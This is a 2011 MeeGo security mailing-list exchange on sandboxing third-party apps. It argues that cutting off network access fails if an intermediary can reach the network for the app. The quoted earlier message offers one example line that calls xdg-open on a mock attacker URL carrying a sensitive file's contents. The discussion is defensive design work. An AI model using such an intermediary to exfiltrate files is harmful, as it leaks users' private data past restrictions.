[Meego-security-discussion] Arbitrary 3rd Party Code
michael.leibowitz at intel.com
Thu Apr 7 17:18:45 PDT 2011
On 04/07/2011 04:32 PM, Praveen Gupta wrote:
> URL is not usable.. Please re-send..
That wasn't a valid URL, it was an example of gaining network access by
My point was that disabling network access seems simple but is harder
than it seems. Not only must one shut off the ability to directly make
network connections, but one must make sure that it is not possible to
use other means to use the network through an intermediary that may not
be able to distinguish that the network is being accessed. In other
words, unless you carry the "label" concept end-to-end, you're just
> Again, separation of local-access only data is, just, one usecase..
> There are several other usecases.. For example -
> * Separation of "enterprise", "Carrier" and "application-sensitive" data
> * Restriction of data cross-over from one domain to another
> Mobile platforms has "unique" security requirements.
> Implementation of these requirements is *necessary* for adoption of mobile
> platforms by "sensitive" enterprise applications (for example).. Several
> other such scenarios / use-cases exists.
> We need *requirements* which we can map to different Meego releases..
> After requirements are frozen, we need to propose "architecture" with
> release plan.
> Thx, -Praveen
> -----Original Message-----
> From: Michael Leibowitz [mailto:michael.leibowitz at intel.com]
> Sent: Thursday, April 07, 2011 4:06 PM
> To: pgupta at mobilestack.com
> Cc: Andy Ross; meego-security-discussion at lists.meego.com
> Subject: Re: [Meego-security-discussion] Arbitrary 3rd Party Code
> On 04/07/2011 03:53 PM, pgupta at mobilestack.com wrote:
>> By identifying data as local access data only, we should "disable" network
> access for such aplication and solve this problem
> xdg-open http://l33th4x0rs.com/pwnme?file=$sensitive_file&data=.....
More information about the MeeGo-security-discussion